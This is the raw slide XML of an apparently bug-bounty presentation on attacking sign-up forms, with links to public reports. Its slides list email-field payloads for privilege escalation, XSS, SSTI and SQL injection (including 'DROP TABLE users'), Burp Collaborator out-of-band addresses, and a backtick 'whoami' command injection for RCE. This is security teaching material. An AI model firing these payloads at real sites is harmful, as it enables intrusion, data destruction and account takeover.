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Lato"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId53"/>
      <p:bold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Lato-regular.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.fntdata"/><Relationship Id="rId45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SourceCodePro-regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePr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SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack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9d77201d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9d77201d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090d8c3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e090d8c3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136d7c7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136d7c7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e136d7c70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e136d7c70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ab190b7c8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ab190b7c8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ab190b7c8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ab190b7c8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a80530a4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a80530a4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83c1c7a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83c1c7a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b2353e6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b2353e6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a2078b56c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a2078b56c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e1780011b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e1780011b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413f385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413f385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a80530a2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a80530a2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e1780011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e1780011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ab190b7c8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ab190b7c8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e1780011b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e1780011b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ab190b7c8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ab190b7c8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ab190b7c8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ab190b7c8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b42920a4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b42920a4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a2078b56c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a2078b56c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a2078b56c1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a2078b56c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a2078b56c1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a2078b56c1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80530a3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80530a3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b9eecde9d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b9eecde9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ab190b7c8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ab190b7c8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a345f21a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a345f21a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ab190b7c8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ab190b7c8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ab9dbea9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ab9dbea9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a2078b56c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a2078b56c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ab190b7c8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ab190b7c8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5413f385f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5413f385f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2078b56c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2078b56c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1780011b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1780011b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1780011b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e1780011b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af71ae8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af71ae8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b190b7c8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b190b7c8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b1cefab9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b1cefab9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699007" y="-20954"/>
            <a:ext cx="7746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909319" y="-20954"/>
            <a:ext cx="73254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457200" y="1202246"/>
            <a:ext cx="82296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idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165205" y="5009234"/>
            <a:ext cx="16788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7" name="Google Shape;117;p2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OBJECT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4">
  <p:cSld name="OBJECT_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5">
  <p:cSld name="OBJECT_5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2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6">
  <p:cSld name="OBJECT_6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7">
  <p:cSld name="OBJECT_7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8">
  <p:cSld name="OBJECT_8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5" name="Google Shape;165;p3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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487417" y="390906"/>
            <a:ext cx="169200" cy="8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9" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0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0" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028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1" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853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2" name="Google Shape;172;p36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3" name="Google Shape;173;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251022" y="925449"/>
            <a:ext cx="3716100" cy="3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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709160" y="1183005"/>
            <a:ext cx="39774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6" name="Google Shape;176;p3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3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9">
  <p:cSld name="OBJECT_9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3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3" name="Google Shape;183;p3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OBJECT_10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526541" y="2795835"/>
            <a:ext cx="80910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6" name="Google Shape;186;p3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7" name="Google Shape;187;p3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8" name="Google Shape;188;p3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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="77664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39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3" name="Google Shape;193;p3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7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hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External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hyperlink" Target="https://twitter.com/PhilippeDelteil/status/1408176214041411590" TargetMode="External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hyperlink" Target="https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/securinti/status/1408177629199540225" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/securinti/status/1408177930207903749" TargetMode="External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hyperlink" Target="https://twitter.com/intigriti/status/1078318258661531648" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1318532648734773249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s://twitter.com/Haoneses/status/1292456202857742338" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17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hyperlink" Target="https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://twitter.com/intigriti/status/1103705724826411009" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hunter0x7/status/1321149883764645891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hyperlink" Target="https://twitter.com/blanksecc/status/1277599304983687169" TargetMode="External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hyperlink" Target="https://medium.com/@rohitcoder/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://gauravnarwani.com/injecting-6200-to-1200/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://verneet.com/fuzzing-77-till-p1/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/423541" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://twitter.com/intigriti/status/1341374193032687618" TargetMode="External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peakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/HusseiN98D/status/1219350752411430913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hyperlink" Target="https://hackerone.com/reports/251224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hyperlink" Target="https://hx01.me/Abusing_Data_Protection_Laws_For_D0xing_and_Account_Takeovers.pdf" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/intigriti/status/1072181482028978177" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/7995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s://2018.zeronights.ru/wp-content/uploads/materials/2%20ZN2018%20WV%20-%20Blind%20Xss%20%28femida%20plugin%29.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/securinti/status/1001862081178755072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hyperlink" Target="https://twitter.com/Agarri_FR/status/1368159983087591429" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/intigriti/status/1185160357872066561" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/3991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24.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/3227" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://twitter.com/intigriti/status/1187349143678836737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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/secalert/status/1353303406044184577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s://secalert.net/index.html?#2020_2" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://hackerone.com/reports/148609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hyperlink" Target="https://hackerone.com/reports/275186" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/666722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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@frostnull/sql-injection-through-user-agent-44a1150f6888" TargetMode="External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hackerone.com/hackers/hacker-email-alias.html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docs.bugcrowd.com/researchers/participating-in-program/your-bugcrowdninja-email-address/?fbclid=IwAR3gU2qciYzA3Ks8ZCFV8l5WEIBbN1wEtz1wdyIDlHibKGeB2a54L4yaWcw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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1093468744079364096" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1128217148566966272" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://hackerone.com/reports/792295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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://amitp200.medium.com/how-i-bypass-otp-verification-in-account-registration-process-ce698654a7af" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/AliRazzaq_/status/1348271766209224706" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://hackerone.com/reports/994504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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1080835652860764160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25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twitter.com/0xAwali" TargetMode="External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hyperlink" Target="https://hackerone.com/reports/2224" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/246302" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/s0md3v/status/1173603213469110273" TargetMode="External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hyperlink" Target="https://twitter.com/c3l3si4n/status/1359915753252790273" TargetMode="External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hyperlink" Target="https://medium.com/@sakyb7/tale-of-account-takeover-sensitive-info-disclosure-broken-access-control-cea0a5e3a1fd" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://orthonviper.medium.com/information-disclosure-through-signup-endpoint-86d2d66dfef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hyperlink" Target="https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://zseano.medium.com/how-signing-up-for-an-account-with-an-company-com-email-can-have-unexpected-results-7f1b700976f5" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freecodecamp.org/news/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/565883" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://twitter.com/pub3g/status/1341333438549303300" TargetMode="External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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="5084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0" name="Google Shape;200;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="870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1" name="Google Shape;201;p40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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="5350200" cy="13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Sign Up</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="30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3" name="Google Shape;203;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150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04" name="Google Shape;20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1200" y="4110576"/>
            <a:ext cx="727375" cy="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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612025" y="1872375"/>
            <a:ext cx="18849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First Name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06" name="Google Shape;206;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612024" y="2339425"/>
            <a:ext cx="39165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Email Address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07" name="Google Shape;207;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612024" y="2806475"/>
            <a:ext cx="39165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Password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08" name="Google Shape;208;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6643650" y="1872363"/>
            <a:ext cx="18849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Last</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Name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21" name="Google Shape;321;p4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23" name="Google Shape;323;p4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Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Capitalize Mail Address e.g. admin@COMPANY.COM </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Gain Extra Authorities OR Get More Functionalities  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24" name="Google Shape;32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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@COMPANY.COM</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00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&amp;password=*****&amp;captcha=Random&amp;token=CSRF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326" name="Google Shape;326;p4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27" name="Google Shape;32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3" name="Google Shape;333;p5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35" name="Google Shape;335;p5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Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Mail Address In This List </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Gain Extra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Authorities OR Get More Functionalities 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36" name="Google Shape;33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5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admin@gmail.com@company.com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me+(@gmail.com)@company.com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"me@gmail.com"@company.com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 "&lt;me@gmail.com&gt;"@company.com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"me@gmail.com;"@company.com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"me@gmail.com+"@company.com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38" name="Google Shape;338;p5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F3F3F3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F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Google Shape;339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50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41" name="Google Shape;341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7" name="Google Shape;347;p5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49" name="Google Shape;349;p5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Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Mail Address In This List </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Gain Extra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Authorities OR Get More Functionalities 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50" name="Google Shape;35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admin@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@company.com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me+(@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)@company.com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"me@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"@company.com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 "&lt;me@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com&gt;"@company.com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"me@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;"@company.com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"me@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>googlemail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+"@company.com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52" name="Google Shape;352;p5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53" name="Google Shape;35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59" name="Google Shape;359;p5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61" name="Google Shape;361;p5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Sign Up By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This List Of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> As Email Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get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XSS , SSTI , SQLi OR Abusing Of Database  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62" name="Google Shape;36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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me+(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@gmail(&lt;script&gt;alert(0)&lt;/script&gt;).com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&lt;script&gt;alert(0)&lt;/script&gt;"@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&lt;%= 7 * 7 %&gt;"@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me+(${{7*7}})@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"' OR 1=1 -- '"@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); DROP TABLE users;--"@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1250">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;364;p5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65" name="Google Shape;365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2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67" name="Google Shape;367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2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69" name="Google Shape;369;p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2925" y="394635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2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71" name="Google Shape;371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350747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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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73" name="Google Shape;373;p5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2925" y="43394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79" name="Google Shape;379;p5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5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81" name="Google Shape;381;p5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Sign Up By Using This List With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Collaborator</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Mail Address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Backend Information OR Internal IPs  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82" name="Google Shape;38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me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@id.collaborator.net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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.collaborator.net]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user(;me@id.collaborator.net)@gmail.com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me@id.collaborator.net(@gmail.com)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me+(@gmail.com)@id.collaborator.net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&lt;me@id.collaborator.net&gt;user@gmail.com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84" name="Google Shape;384;p5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F3F3F3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F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Google Shape;385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3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87" name="Google Shape;387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3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89" name="Google Shape;389;p5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2925" y="394635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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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91" name="Google Shape;391;p5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4025" y="4331475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3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93" name="Google Shape;393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50747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99" name="Google Shape;399;p5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01" name="Google Shape;401;p5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Sometimes They Ping Your Host Before Sending A Mail So </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Sign Up By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Collaborator Mail Address with Injection OS Command </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get RCE  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02" name="Google Shape;40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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@`whoami`.id.collaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
